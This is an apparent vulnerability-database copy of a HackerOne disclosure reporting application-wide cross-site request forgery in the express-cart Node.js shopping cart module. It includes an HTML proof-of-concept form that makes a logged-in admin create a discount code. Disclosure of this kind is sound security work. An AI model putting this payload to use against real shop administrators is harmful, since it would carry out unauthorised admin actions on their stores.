Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneTuo4n8H1:800356
HistoryFeb 20, 2020 - 8:09 a.m.

Node.js third-party modules: [express-cart] Wide CSRF in application

2020-02-2008:09:27
tuo4n8
hackerone.com
19
JSON

> NOTE! Thanks for submitting a report! Please replace all the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!

I would like to report CSRF in ``express-cart`
It allows attacker cheat admin to do bad behaviors . Main reason is csrf token isn’t used , vulnerability is application wide .

Module

module name: express-cartversion:1.1.16npm page: https://www.npmjs.com/package/express-cart

Module Description

> expressCart is a fully functional shopping cart built in Node.js (Express, MongoDB) with Stripe, PayPal, Authorize.net, Adyen and Instore payments.

Module Stats

[1] weekly downloads : 21

Vulnerability

Vulnerability Description

> Description about how the vulnerability was found and how it can be exploited, how it harms package users (data modification/lost, system access, other.

  • Through csrf attacker can do : create product , order , user , create discount codes ,… (required admin action)

Steps To Reproduce:

> Detailed steps to reproduce with all required references/steps/commands. If there is any exploit code or reference to the package source code this is the place where it should be put.

  • Demo create discount codes : (View detail on clip )

  1. Create PoC with HTML (generated by burpsuite)

  2. Admin click

  3. discount code is created

  • PoC :
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:1111/admin/settings/discount/create" method="POST">
      <input type="hidden" name="code" value="CSRF-CODE-DEMO" />
      <input type="hidden" name="type" value="percent" />
      <input type="hidden" name="value" value="30" />
      <input type="hidden" name="start" value="21/02/2020 14:32" />
      <input type="hidden" name="end" value="22/02/2020 14:32" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Wrap up

> Select Y or N for the following statements:

  • I contacted the maintainer to let them know: [Y/N] N
  • I opened an issue in the related repository: [Y/N] N

> Hunter’s comments and funny memes goes here

Impact

attacker can do admin privileges

JSON